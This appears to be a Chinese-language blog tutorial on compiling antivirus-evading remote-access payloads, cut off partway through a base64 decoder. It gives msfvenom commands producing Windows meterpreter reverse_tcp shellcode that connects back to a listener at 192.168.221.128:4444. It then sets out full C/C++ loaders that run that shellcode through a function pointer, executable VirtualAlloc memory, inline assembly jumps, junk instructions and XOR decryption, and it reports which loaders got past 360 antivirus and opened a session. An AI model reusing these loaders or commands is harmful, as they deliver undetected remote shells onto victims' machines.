远控免杀——编译篇

远控免杀——编译篇

前言

上一篇是利用各种工具进行免杀,其中很多工具涉及到对shellcode进行混淆编码的操作处理,接着用python、ruby、C/C++等语言进行编译加载

C/C++

方法

  1. 使用加载器加载C/C++代码
  2. C/C++源码 + Shellcode直接编译生成,执行Shellcode的方式有:指针执行、汇编指令执行、申请动态内存等

指针执行

msfvenom生成C语言shellcode

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.221.128 lport=4444 -f c -o shell.c

用vs自行编译

unsigned char buf[] =
"\xd9\xc2\xd9\x74\x24\xf4\xb8\x8f\xd6\xe6\xb7\x5b\x33\xc9\xb1"
"\x7b\x31\x43\x18\x03\x43\x18\x83\xeb\x73\x34\x13\x6e\x40\x60"
"\xa8\xb5\xa2\x2c\x5a\x5d\x63\x10\x05\x92\xba\x27\xc1\xe5\x44"
"\x51\xa9\xee\x48\x62\xd5\xfb\x59\x7b\xd1\x87\xcb\x79\xd5\x71"
"\xbd\xa6\x40\xa4\x13\x2b\xe2\x48\xb8\x75\xbb\x03\xef\xab\x73"
"\xb9\x69\xf2\x18\x45\xf5\x82\x87\x2d\xc3\xaa\x59\xb4\x3c\xc0"
"\xa6\x9a\xe6\x20\x17\x8c\xc0\x87\xc8\x6a\xcb\xb3\xb2\x1f\x60"
"\x0b\x8a\x8c\x5f\xba\x08\xac\x2a\x1c\x2d\x9e\x1e\x0d\x29\xf2"
"\xf1\x83\xdb\xf4\xf8\xdb\xd9\x56\x9c\x51\x2d\x70\xe7\xa6\x9a"
"\x4a\x5e\xd5\x05\x16\x25\x2a\x80\xf3\xd7\xe1\xc6\xae\xef\xe6"
"\xb5\x7e\x0e\x1a\x89\x9d\x47\x33\x6a\xc4\x4d\x53\x72\x12\x8e"
"\xc9\x1c\xe1\x9e\xee\xeb\x0b\x7a\x5d\x1b\xa7\x79\x4e\xbb\xcf"
"\xbe\xee\x9b\x92\x71\x37\x90\x10\xf9\x3e\x47\x7b\x85\xc1\x69"
"\x08\xd0\xbd\x3e\x39\xab\x3c\x46\xa8\x1a\x0e\xa8\xa8\x5a\xfe"
"\x2a\x44\x35\x2d\x26\x83\x4c\xbb\x7f\x30\xe9\xee\xc5\x46\x7f"
"\xa9\x32\x31\x92\x3c\xfc\x36\x12\xde\x35\xff\xad\xa9\x53\x52"
"\x61\xfe\xdf\x86\xb9\xb8\xc0\xc3\xa2\x11\x61\xcd\xd9\x3e\x83"
"\xae\x0c\x8b\x30\x3e\x9f\xb8\x6a\x9e\xc6\x5f\x44\xa6\x63\x6b"
"\x01\x38\x5c\x5e\x77\xcd\x5a\xa3\xe9\x7e\x60\xbc\x15\xc8\x87"
"\x50\x76\x71\x76\xc9\xd4\x2d\xfe\xa2\x91\x3f\x97\x5b\xd2\xba"
"\x4f\x97\xdf\xf0\x2c\xa9\xfd\x6f\x17\x11\x94\x8e\xb9\xca\xce"
"\x7d\xf4\xe3\xc2\xd7\x72\x67\x23\x55\x2e\xdc\x47\x97\xae\xa2"
"\xc6\x17\x59\xc2\xa2\xfa\x95\xb4\x4e\xb0\x23\x37\x56\x71\xc4"
"\x7a\xcb\xfb\xfe\xa2\xe4\x32\xa1\x30\x2a\x44\x34\x4d\x67\x9e"
"\x91\xcf\x03\x59\x67\x33\xf7\xae\x80\x76\x49\x73\x36\xdf\x16"
"\x69\x99\x80\x24\x0d\x17\xaf\x92\x2b\x41\x86\xf8\x45\xdb\x54"
"\x7f\x74\x2c\x5b\xc0\x2f\x33\x26\x0e\xa9\xfc\xe4\xcf\x5b\x67"
"\xf6\x06\x43\x14\x15\x71\xf6\xaf\x3c\x51\x57\x13\x57\x04\x58"
"\x2d\xd7\x6f\x6e\xb5\x16\x07\x30\x99\xf9\x64\x0b\x5c\x10\x0c"
"\x90\x72\x44\x08\xc3\x59\x91\x25\xb8\xda\x49\x93\x0b\xea\xcd"
"\x2d\xb6\xb0\xdb\xaf\xa0\x9b\x0e\x8f\x78\x44\x04\xb2\x25\x80"
"\x44\xa0\xb4\x9a\x23\xce\x05\x3d\xbb\xe8\xc0\x36\xf3\x48\xcf"
"\xa7\xe8\xfe\x74\x4a\x25\xa7\x18\x0f\x37\xdb\x25\x3f\xa2\x09"
"\x16\x1e\x06\xb9\xc1\x58\xd6\xcf\xf4\x7b\x26\x84\x21\x54\x54"
"\x46\x6f\x80\x09\xda\xe1";
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
// MSVC-only linker directive: GUI subsystem with the console CRT entry point,
// so the program runs without opening a console window.
/* Entry point: treats the global byte array `buf` as a function and calls it
 * in place. `&buf` is a pointer to the whole array cast to a function pointer,
 * so execution begins at buf[0]. Implicit-int `main()` is pre-C99 style. */
main()

{
((void(*)(void)) & buf)();
}

编译生成exe

image-20220221110611772

还没运行文件过了两分钟就被查杀了

申请动态内存

申请动态内存并加载shellcode,shellcode代码同上

#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
//windows控制台程序不出黑窗口
unsigned char buf[] =
"\xd9\xc2\xd9\x74\x24\xf4\xb8\x8f\xd6\xe6\xb7\x5b\x33\xc9\xb1"
"\x7b\x31\x43\x18\x03\x43\x18\x83\xeb\x73\x34\x13\x6e\x40\x60"
"\xa8\xb5\xa2\x2c\x5a\x5d\x63\x10\x05\x92\xba\x27\xc1\xe5\x44"
"\x51\xa9\xee\x48\x62\xd5\xfb\x59\x7b\xd1\x87\xcb\x79\xd5\x71"
"\xbd\xa6\x40\xa4\x13\x2b\xe2\x48\xb8\x75\xbb\x03\xef\xab\x73"
"\xb9\x69\xf2\x18\x45\xf5\x82\x87\x2d\xc3\xaa\x59\xb4\x3c\xc0"
"\xa6\x9a\xe6\x20\x17\x8c\xc0\x87\xc8\x6a\xcb\xb3\xb2\x1f\x60"
"\x0b\x8a\x8c\x5f\xba\x08\xac\x2a\x1c\x2d\x9e\x1e\x0d\x29\xf2"
"\xf1\x83\xdb\xf4\xf8\xdb\xd9\x56\x9c\x51\x2d\x70\xe7\xa6\x9a"
"\x4a\x5e\xd5\x05\x16\x25\x2a\x80\xf3\xd7\xe1\xc6\xae\xef\xe6"
"\xb5\x7e\x0e\x1a\x89\x9d\x47\x33\x6a\xc4\x4d\x53\x72\x12\x8e"
"\xc9\x1c\xe1\x9e\xee\xeb\x0b\x7a\x5d\x1b\xa7\x79\x4e\xbb\xcf"
"\xbe\xee\x9b\x92\x71\x37\x90\x10\xf9\x3e\x47\x7b\x85\xc1\x69"
"\x08\xd0\xbd\x3e\x39\xab\x3c\x46\xa8\x1a\x0e\xa8\xa8\x5a\xfe"
"\x2a\x44\x35\x2d\x26\x83\x4c\xbb\x7f\x30\xe9\xee\xc5\x46\x7f"
"\xa9\x32\x31\x92\x3c\xfc\x36\x12\xde\x35\xff\xad\xa9\x53\x52"
"\x61\xfe\xdf\x86\xb9\xb8\xc0\xc3\xa2\x11\x61\xcd\xd9\x3e\x83"
"\xae\x0c\x8b\x30\x3e\x9f\xb8\x6a\x9e\xc6\x5f\x44\xa6\x63\x6b"
"\x01\x38\x5c\x5e\x77\xcd\x5a\xa3\xe9\x7e\x60\xbc\x15\xc8\x87"
"\x50\x76\x71\x76\xc9\xd4\x2d\xfe\xa2\x91\x3f\x97\x5b\xd2\xba"
"\x4f\x97\xdf\xf0\x2c\xa9\xfd\x6f\x17\x11\x94\x8e\xb9\xca\xce"
"\x7d\xf4\xe3\xc2\xd7\x72\x67\x23\x55\x2e\xdc\x47\x97\xae\xa2"
"\xc6\x17\x59\xc2\xa2\xfa\x95\xb4\x4e\xb0\x23\x37\x56\x71\xc4"
"\x7a\xcb\xfb\xfe\xa2\xe4\x32\xa1\x30\x2a\x44\x34\x4d\x67\x9e"
"\x91\xcf\x03\x59\x67\x33\xf7\xae\x80\x76\x49\x73\x36\xdf\x16"
"\x69\x99\x80\x24\x0d\x17\xaf\x92\x2b\x41\x86\xf8\x45\xdb\x54"
"\x7f\x74\x2c\x5b\xc0\x2f\x33\x26\x0e\xa9\xfc\xe4\xcf\x5b\x67"
"\xf6\x06\x43\x14\x15\x71\xf6\xaf\x3c\x51\x57\x13\x57\x04\x58"
"\x2d\xd7\x6f\x6e\xb5\x16\x07\x30\x99\xf9\x64\x0b\x5c\x10\x0c"
"\x90\x72\x44\x08\xc3\x59\x91\x25\xb8\xda\x49\x93\x0b\xea\xcd"
"\x2d\xb6\xb0\xdb\xaf\xa0\x9b\x0e\x8f\x78\x44\x04\xb2\x25\x80"
"\x44\xa0\xb4\x9a\x23\xce\x05\x3d\xbb\xe8\xc0\x36\xf3\x48\xcf"
"\xa7\xe8\xfe\x74\x4a\x25\xa7\x18\x0f\x37\xdb\x25\x3f\xa2\x09"
"\x16\x1e\x06\xb9\xc1\x58\xd6\xcf\xf4\x7b\x26\x84\x21\x54\x54"
"\x46\x6f\x80\x09\xda\xe1";
/* Entry point: copies `buf` into a newly committed memory region that is
 * readable, writable and executable at once (PAGE_EXECUTE_READWRITE) and
 * then calls that region as a function. Implicit-int `main()` is pre-C99 style. */
main()
{
char *Memory;
Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}

编译生成exe

image-20220221111130208

结果和上面一样,刚传进去扫描没报毒,过一会就被查杀了

嵌入汇编加载

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] =
"\xbf\xf3\x8d\xa9\x93\xdb\xdc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x7b\x83\xea\xfc\x31\x7a\x0f\x03\x7a\xfc\x6f\x5c\x49\xdc\xa9"
"\xeb\x4a\x14\xf3\xbe\x37\xda\x1c\xe7\x06\x2b\xad\x63\xea\x6b"
"\xca\xba\xbc\x7e\xd0\xec\x29\xc8\x87\xbc\x57\x56\x43\x43\xbb"
"\x38\xcd\xce\x6f\x6e\xe0\x75\x8a\x8d\x44\xed\xe1\x47\xf8\xa2"
"\x90\xfc\x52\x14\x37\x71\x51\x05\x4e\x90\x97\x8b\xaf\xd9\x2a"
"\x99\x5d\xa1\x39\x15\x30\x73\xe6\x82\x51\x9c\x80\x32\xbe\xed"
"\x56\x51\xbd\xf0\xa7\x99\x93\xd8\x7a\x89\x69\xde\x5c\xc9\x75"
"\xc6\x95\xd3\x71\x15\xb9\xcf\x88\xaf\x3f\x0b\x5a\x3d\x03\x11"
"\xd6\xdf\x2c\x80\x7d\x5b\x26\x0d\x76\x6d\x4e\xe7\xa7\xe2\x89"
"\x41\xf2\x25\x60\x1c\x66\x0d\x71\x99\xff\x73\x11\xbe\x6b\x23"
"\xed\x4b\x58\xaf\xa4\x88\x07\xbf\x32\x60\x82\xf3\x0f\x05\xb2"
"\x42\x28\x3b\x1f\x2a\xd4\x15\x7c\xa8\x06\xcf\xb1\x31\x0b\xf6"
"\x85\x26\xd6\x2b\x23\x44\xad\x50\x75\xad\x1c\xe9\x88\x5c\x32"
"\x88\xc4\x83\x22\x2e\x18\x92\x93\x33\x8d\x2e\xba\xbf\xa8\x04"
"\xbb\x51\x01\x45\x9b\x97\xdc\x15\xb0\xbb\x7c\x08\x27\x7a\x1f"
"\x19\x4f\x3c\x2a\x04\x1e\xe4\xe6\x3e\x49\x33\xd7\x18\x95\x93"
"\x17\x6b\x9f\xd6\x31\x20\x1b\x7a\x77\x7b\x53\xbf\x98\x9c\x9c"
"\xe7\x7c\x9c\xaa\x09\x38\xdd\x97\x40\x0a\x5e\x5f\x45\xcc\xf8"
"\xc8\xd4\x35\x21\x7a\x6b\xa0\x57\x2b\xb6\xd5\x14\x3c\xbd\xb1"
"\xa0\x2f\x48\x12\xa4\x79\x3f\xf9\x4e\x47\xc2\x85\x61\x97\x15"
"\x37\x21\x3c\xb9\x11\x27\x6a\x4f\x80\xc5\x94\x41\xde\x05\x93"
"\xa4\xce\xc6\xd9\xf0\x0c\x61\xdf\x98\x98\xd4\x88\x8a\xe5\x2c"
"\xcb\x99\x6f\x91\x37\xd8\xc9\x98\x82\xca\x95\x27\xa8\xff\x62"
"\x8e\xb8\xfa\x73\xa0\xd8\xb5\x6e\x40\x0c\x4a\xdd\x5f\x74\x7b"
"\x6a\x57\x04\xce\x47\x4e\x3c\x7d\xea\x0a\xd7\x41\x05\x22\xf0"
"\xa8\x24\xed\x65\xc7\xa1\xc4\xca\xea\x1f\x0c\xaf\x71\x63\x4c"
"\x92\x8f\xc9\x44\x87\xb5\x69\x9c\x4b\xb1\x2b\x24\x7b\xe0\xe4"
"\x06\x88\xaf\x3d\xb0\x8d\xca\x4f\xda\xba\xac\x86\x58\xf9\x41"
"\x01\xc7\x4f\x45\x78\x0b\x3c\xb6\xe7\x4f\x0b\x98\x88\x0b\x66"
"\xdf\xc8\x8b\xf8\x1b\x28\x28\x3e\x47\xa1\xf1\x10\xe3\x15\x2a"
"\x65\xeb\x95\xb1\x5a\x99\x44\x13\xac\xc2\x1b\x5d\x8a\xbf\x97"
"\x0a\xc3\xc9\x11\xdd\x40\x54\x16\x18\xf5\x95\x9d\x40\xd2\x9b"
"\x71\xfe\xa2\x40\x31\xd5\x31\x99\xc9\xcd\xe1\xd2\x73\x59\xf6"
"\xbe\x89\x55\xf4\x30\x8a";
/* Entry point: inline assembly loads the address of the global `shellcode`
 * array into eax and jumps to it. The array lives in .data, which the
 * linker pragma at the top of this file marks RWE so the jump target is
 * executable. `__asm` blocks are only accepted by 32-bit MSVC. */
void main()
{
__asm
{

mov eax, offset shellcode
jmp eax
}
}

shellcode重新生成了一次,编译生成exe

image-20220221112241097

image-20220221112310479

msf正常上线

image-20220221111720866

360静态动态均没有查杀

PS:win7中运行如果出现 vcruntime140D.dll丢失 报错,可以修改运行库为多线程(/MT),默认是MTD

image-20220221112445023

强制类型转换

#include <windows.h>
#include <stdio.h>

unsigned char buf[] =
"\xbf\xf3\x8d\xa9\x93\xdb\xdc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x7b\x83\xea\xfc\x31\x7a\x0f\x03\x7a\xfc\x6f\x5c\x49\xdc\xa9"
"\xeb\x4a\x14\xf3\xbe\x37\xda\x1c\xe7\x06\x2b\xad\x63\xea\x6b"
"\xca\xba\xbc\x7e\xd0\xec\x29\xc8\x87\xbc\x57\x56\x43\x43\xbb"
"\x38\xcd\xce\x6f\x6e\xe0\x75\x8a\x8d\x44\xed\xe1\x47\xf8\xa2"
"\x90\xfc\x52\x14\x37\x71\x51\x05\x4e\x90\x97\x8b\xaf\xd9\x2a"
"\x99\x5d\xa1\x39\x15\x30\x73\xe6\x82\x51\x9c\x80\x32\xbe\xed"
"\x56\x51\xbd\xf0\xa7\x99\x93\xd8\x7a\x89\x69\xde\x5c\xc9\x75"
"\xc6\x95\xd3\x71\x15\xb9\xcf\x88\xaf\x3f\x0b\x5a\x3d\x03\x11"
"\xd6\xdf\x2c\x80\x7d\x5b\x26\x0d\x76\x6d\x4e\xe7\xa7\xe2\x89"
"\x41\xf2\x25\x60\x1c\x66\x0d\x71\x99\xff\x73\x11\xbe\x6b\x23"
"\xed\x4b\x58\xaf\xa4\x88\x07\xbf\x32\x60\x82\xf3\x0f\x05\xb2"
"\x42\x28\x3b\x1f\x2a\xd4\x15\x7c\xa8\x06\xcf\xb1\x31\x0b\xf6"
"\x85\x26\xd6\x2b\x23\x44\xad\x50\x75\xad\x1c\xe9\x88\x5c\x32"
"\x88\xc4\x83\x22\x2e\x18\x92\x93\x33\x8d\x2e\xba\xbf\xa8\x04"
"\xbb\x51\x01\x45\x9b\x97\xdc\x15\xb0\xbb\x7c\x08\x27\x7a\x1f"
"\x19\x4f\x3c\x2a\x04\x1e\xe4\xe6\x3e\x49\x33\xd7\x18\x95\x93"
"\x17\x6b\x9f\xd6\x31\x20\x1b\x7a\x77\x7b\x53\xbf\x98\x9c\x9c"
"\xe7\x7c\x9c\xaa\x09\x38\xdd\x97\x40\x0a\x5e\x5f\x45\xcc\xf8"
"\xc8\xd4\x35\x21\x7a\x6b\xa0\x57\x2b\xb6\xd5\x14\x3c\xbd\xb1"
"\xa0\x2f\x48\x12\xa4\x79\x3f\xf9\x4e\x47\xc2\x85\x61\x97\x15"
"\x37\x21\x3c\xb9\x11\x27\x6a\x4f\x80\xc5\x94\x41\xde\x05\x93"
"\xa4\xce\xc6\xd9\xf0\x0c\x61\xdf\x98\x98\xd4\x88\x8a\xe5\x2c"
"\xcb\x99\x6f\x91\x37\xd8\xc9\x98\x82\xca\x95\x27\xa8\xff\x62"
"\x8e\xb8\xfa\x73\xa0\xd8\xb5\x6e\x40\x0c\x4a\xdd\x5f\x74\x7b"
"\x6a\x57\x04\xce\x47\x4e\x3c\x7d\xea\x0a\xd7\x41\x05\x22\xf0"
"\xa8\x24\xed\x65\xc7\xa1\xc4\xca\xea\x1f\x0c\xaf\x71\x63\x4c"
"\x92\x8f\xc9\x44\x87\xb5\x69\x9c\x4b\xb1\x2b\x24\x7b\xe0\xe4"
"\x06\x88\xaf\x3d\xb0\x8d\xca\x4f\xda\xba\xac\x86\x58\xf9\x41"
"\x01\xc7\x4f\x45\x78\x0b\x3c\xb6\xe7\x4f\x0b\x98\x88\x0b\x66"
"\xdf\xc8\x8b\xf8\x1b\x28\x28\x3e\x47\xa1\xf1\x10\xe3\x15\x2a"
"\x65\xeb\x95\xb1\x5a\x99\x44\x13\xac\xc2\x1b\x5d\x8a\xbf\x97"
"\x0a\xc3\xc9\x11\xdd\x40\x54\x16\x18\xf5\x95\x9d\x40\xd2\x9b"
"\x71\xfe\xa2\x40\x31\xd5\x31\x99\xc9\xcd\xe1\xd2\x73\x59\xf6"
"\xbe\x89\x55\xf4\x30\x8a";
pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
/* Entry point: calls the global byte array `buf` directly through a
 * WINAPI (stdcall) function pointer, i.e. execution starts at buf[0]
 * inside the .data section. */
void main()
{
((void(WINAPI*)(void))&buf)();
}

编译生成exe

image-20220221113953681

静态没问题,执行被查杀

汇编花指令

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] =
"\xbf\xf3\x8d\xa9\x93\xdb\xdc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x7b\x83\xea\xfc\x31\x7a\x0f\x03\x7a\xfc\x6f\x5c\x49\xdc\xa9"
"\xeb\x4a\x14\xf3\xbe\x37\xda\x1c\xe7\x06\x2b\xad\x63\xea\x6b"
"\xca\xba\xbc\x7e\xd0\xec\x29\xc8\x87\xbc\x57\x56\x43\x43\xbb"
"\x38\xcd\xce\x6f\x6e\xe0\x75\x8a\x8d\x44\xed\xe1\x47\xf8\xa2"
"\x90\xfc\x52\x14\x37\x71\x51\x05\x4e\x90\x97\x8b\xaf\xd9\x2a"
"\x99\x5d\xa1\x39\x15\x30\x73\xe6\x82\x51\x9c\x80\x32\xbe\xed"
"\x56\x51\xbd\xf0\xa7\x99\x93\xd8\x7a\x89\x69\xde\x5c\xc9\x75"
"\xc6\x95\xd3\x71\x15\xb9\xcf\x88\xaf\x3f\x0b\x5a\x3d\x03\x11"
"\xd6\xdf\x2c\x80\x7d\x5b\x26\x0d\x76\x6d\x4e\xe7\xa7\xe2\x89"
"\x41\xf2\x25\x60\x1c\x66\x0d\x71\x99\xff\x73\x11\xbe\x6b\x23"
"\xed\x4b\x58\xaf\xa4\x88\x07\xbf\x32\x60\x82\xf3\x0f\x05\xb2"
"\x42\x28\x3b\x1f\x2a\xd4\x15\x7c\xa8\x06\xcf\xb1\x31\x0b\xf6"
"\x85\x26\xd6\x2b\x23\x44\xad\x50\x75\xad\x1c\xe9\x88\x5c\x32"
"\x88\xc4\x83\x22\x2e\x18\x92\x93\x33\x8d\x2e\xba\xbf\xa8\x04"
"\xbb\x51\x01\x45\x9b\x97\xdc\x15\xb0\xbb\x7c\x08\x27\x7a\x1f"
"\x19\x4f\x3c\x2a\x04\x1e\xe4\xe6\x3e\x49\x33\xd7\x18\x95\x93"
"\x17\x6b\x9f\xd6\x31\x20\x1b\x7a\x77\x7b\x53\xbf\x98\x9c\x9c"
"\xe7\x7c\x9c\xaa\x09\x38\xdd\x97\x40\x0a\x5e\x5f\x45\xcc\xf8"
"\xc8\xd4\x35\x21\x7a\x6b\xa0\x57\x2b\xb6\xd5\x14\x3c\xbd\xb1"
"\xa0\x2f\x48\x12\xa4\x79\x3f\xf9\x4e\x47\xc2\x85\x61\x97\x15"
"\x37\x21\x3c\xb9\x11\x27\x6a\x4f\x80\xc5\x94\x41\xde\x05\x93"
"\xa4\xce\xc6\xd9\xf0\x0c\x61\xdf\x98\x98\xd4\x88\x8a\xe5\x2c"
"\xcb\x99\x6f\x91\x37\xd8\xc9\x98\x82\xca\x95\x27\xa8\xff\x62"
"\x8e\xb8\xfa\x73\xa0\xd8\xb5\x6e\x40\x0c\x4a\xdd\x5f\x74\x7b"
"\x6a\x57\x04\xce\x47\x4e\x3c\x7d\xea\x0a\xd7\x41\x05\x22\xf0"
"\xa8\x24\xed\x65\xc7\xa1\xc4\xca\xea\x1f\x0c\xaf\x71\x63\x4c"
"\x92\x8f\xc9\x44\x87\xb5\x69\x9c\x4b\xb1\x2b\x24\x7b\xe0\xe4"
"\x06\x88\xaf\x3d\xb0\x8d\xca\x4f\xda\xba\xac\x86\x58\xf9\x41"
"\x01\xc7\x4f\x45\x78\x0b\x3c\xb6\xe7\x4f\x0b\x98\x88\x0b\x66"
"\xdf\xc8\x8b\xf8\x1b\x28\x28\x3e\x47\xa1\xf1\x10\xe3\x15\x2a"
"\x65\xeb\x95\xb1\x5a\x99\x44\x13\xac\xc2\x1b\x5d\x8a\xbf\x97"
"\x0a\xc3\xc9\x11\xdd\x40\x54\x16\x18\xf5\x95\x9d\x40\xd2\x9b"
"\x71\xfe\xa2\x40\x31\xd5\x31\x99\xc9\xcd\xe1\xd2\x73\x59\xf6"
"\xbe\x89\x55\xf4\x30\x8a";

/* Entry point: inline assembly loads the address of the global `shellcode`
 * array into eax; the two `_emit` directives then place literal opcode bytes
 * into the instruction stream where the earlier listing used the `jmp eax`
 * mnemonic. The array lives in .data, made RWE by the linker pragma above.
 * `__asm` blocks are only accepted by 32-bit MSVC. */
void main()
{
__asm
{

mov eax, offset shellcode
_emit 0xFF
_emit 0xE0
}
}

编译生成exe

image-20220221114336304

msf正常上线

image-20220221114327049

360动态静态查杀均没查杀

XOR加密

msfvenom生成raw格式shellcode

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.221.128 lport=4444 -f raw > shellcode.raw

ShellcodeWrapper进行加密

python shellcode_encoder.py -cpp -cs -py shellcode.raw jasontt xor
//key:jasontt

生成C++、C#、python文件均可以用来攻击,css.exe执行C#等

C++代码如下

/*
Author: Arno0x0x, Twitter: @Arno0x0x
*/

#include "stdafx.h" //编译报错此处删掉
#include <windows.h>
#include <iostream>

int main(int argc, char **argv) {

// Encrypted shellcode and cipher key obtained from shellcode_encoder.py
char encryptedShellcode[] = "\xd5\xac\x20\x16\x16\xae\xbe\xb3\x15\x57\x9b\x34\x47\xbd\xdb\x1a\xf0\xad\x6a\x45\x0e\x65\x62\x09\xad\xdf\xf8\xd7\x68\x8d\x68\x1f\x20\x25\xa3\xdb\x7e\x69\xc7\xa1\x59\x41\x0f\x2d\x64\xd2\xd5\x59\xf6\xd7\xa4\xb7\xac\x28\x46\xe0\xc7\x34\xa6\xb5\x49\x3c\x3b\x16\x55\x76\x28\x11\x84\x15\x8c\x6e\xc1\x0e\x10\x08\x0b\x80\x60\x80\xdc\xe0\xcd\xe8\xa7\x18\x95\x12\xe2\xfa\xf2\xc1\x1f\x35\xb2\xaa\x3a\xe8\xd0\xad\x46\x2e\x0a\x09\xf6\xf4\x21\x10\x9b\xc8\x8a\x3e\x6e\xdd\x7e\x0a\x7f\x16\xc2\x9e\x0c\xe2\xa4\x77\xc5\x86\x90\x00\x8b\xb0\x42\x39\xa3\x7f\x37\x4f\x22\xc2\x1f\xba\x39\x31\xc1\xc4\xd2\x3b\xc0\x11\x91\xbe\xaa\x9b\x89\x45\xb2\x10\x3b\xca\x5b\x04\x3c\x2b\x4e\x13\x25\x29\xce\x88\x97\x0f\x64\x16\xfe\x62\x4c\x46\xd9\xe2\x81\x2a\x69\x33\x44\x8f\x48\x58\xac\x8c\x67\xe1\x94\x55\xbc\x14\x26\xa2\x77\xb8\x66\x5a\x9a\xbf\x10\xcc\x69\xa8\xe0\x6d\x53\xb1\x0f\xf7\xe9\x45\x24\x08\xf8\x0d\x88\x84\x86\x2f\xdc\x2b\xdf\x2d\x5e\xab\xac\xe9\x44\x11\x95\x4b\xdc\xff\x7d\xe1\x26\xa4\x6e\x58\x53\x5d\xb9\x15\xb5\xf5\xdd\x74\x8c\x01\xb3\x0b\x26\x43\xc4\xdf\x52\xbe\xbe\x78\xc2\xbc\xc0\x8c\xa5\x12\xb8\x47\x7c\x03\x60\x9d\xa0\x15\xad\xd7\x2a\xa6\xe2\x44\x4b\xb1\xd9\x13\x91\xc9\x65\x20\x27\x8e\x8a\xe3\x49\x5c\x06\x2c\xcc\x00\x63\x70\x9f\xa5\xab\xf1\x9c\x3d\xf1\xde\x5f\x85\xbb\x52\x67\xe7\x65\xaf\xd6\xec\xd0\xb4\x8d\x62\xcd\xe1\xc0\xc1\x60\xb1\x91\x1d\x82\x87\x64\xf6\xaf\x30\x54\x0a\xed\x8b\x06\x41\xdd\x54\x03\xf1\xc6\x2a\xb2\x57\xb8\xd7\x83\x4e\xd0\xab\xb3\x94\x00\x6d\xff\xe0\xc1\x52\x16\x7e\x66\x1a\xb0\xa8\x0b\x21\x0b\x03\x51\x14\x56\x30\x0c\xea\x89\x4b\x27\xbe\x30\xab\xc0\xe7\x8c\xba\x8c\xfd\x68\x77\x81\x4a\x99\x56\xa9\x07\xbe\x19\x9f\x21\xfd\xd3\xdb\xb2\xca\x36\xd3\x36\xaf\xcc\x4a\x18\xb4\xdc\x77\x01\xd7\x58\x55\xcf\xfa\xf4\x88\x82\xcc\xda\x88\x0b\x85\xe2\xcd\x46\x6a\x65\xe5\x7b\xe3\x38\x89\x1d\x40\xa3\x4e\x51\xd0\x8b\x96\x64\xfc\xfb\x68\x34\x1c\x80\x78\x68\x28\xc6\xc3\xc6\xa1\xa4\x62\xd4\xdb\x53\x26\xf2\x82\xd7\x40\xcb\xbd\x93\xfb\x79\xd0\x7a\xab\x99\x60\x02\xad\xe1\x18\xd4\x8
c\x84\x68\xa2\xba\x34\x2c\x1b\xd3\x57\xe9\x9a\x79\x92\x87\xb5\x86\x2a\x0d\xc2\x17\x16\x83\x00";
char key[] = "jasontt";
char cipherType[] = "xor";

// Char array to host the deciphered shellcode
char shellcode[sizeof encryptedShellcode];


// XOR decoding stub using the key defined above must be the same as the encoding key
int j = 0;
for (int i = 0; i < sizeof encryptedShellcode; i++) {
if (j == sizeof key - 1) j = 0;

shellcode[i] = encryptedShellcode[i] ^ key[j];
j++;
}

// Allocating memory with EXECUTE writes
void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

// Copying deciphered shellcode into memory as a function
memcpy(exec, shellcode, sizeof shellcode);

// Call the shellcode
((void(*)())exec)();
}

编译生成exe

image-20220221151609401

msf正常上线

image-20220221151723462

这里有个小插曲,中间去上课了,本来msf正常上线说明动静态查杀都过了,但是下课回来的时候发现已经被查杀了,出现这种情况说明之前的某些免杀效果可能也只是暂时的。

Kali中运行ShellcodeWrapper可能出现的问题,解决方法如下:

问题:No module named Crypto.Hash

解决方法:

pip uninstall pycrypto
pip install pycryptodome

Base64加密

msfvenom生成base64编码shellcode

msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.221.128 lport=4444 -f c > shell.c

base64.c

/* Base64 encoder/decoder. Originally Apache file ap_base64.c
*/
#include <string.h>
#include "base64.h"
/* aaaack but it's fast and const should make it shared text page. */
/* Reverse alphabet lookup, indexed by input byte:
 *   'A'-'Z' -> 0..25, 'a'-'z' -> 26..51, '0'-'9' -> 52..61, '+' -> 62, '/' -> 63.
 * Every other byte (including '=' padding and the NUL terminator) maps to 64,
 * which Base64decode()/Base64decode_len() use as their stop marker. */
static const unsigned char pr2six[256] =
{
/* ASCII table */
/* 0x00-0x1F: control characters */
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
/* 0x20-0x2F: '+' (0x2B) -> 62, '/' (0x2F) -> 63 */
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
/* 0x30-0x3F: '0'-'9' -> 52..61; '=' (0x3D) is a stop marker */
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
/* 0x40-0x5F: 'A'-'Z' -> 0..25 */
64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
/* 0x60-0x7F: 'a'-'z' -> 26..51 */
64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
/* 0x80-0xFF: never part of the alphabet */
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
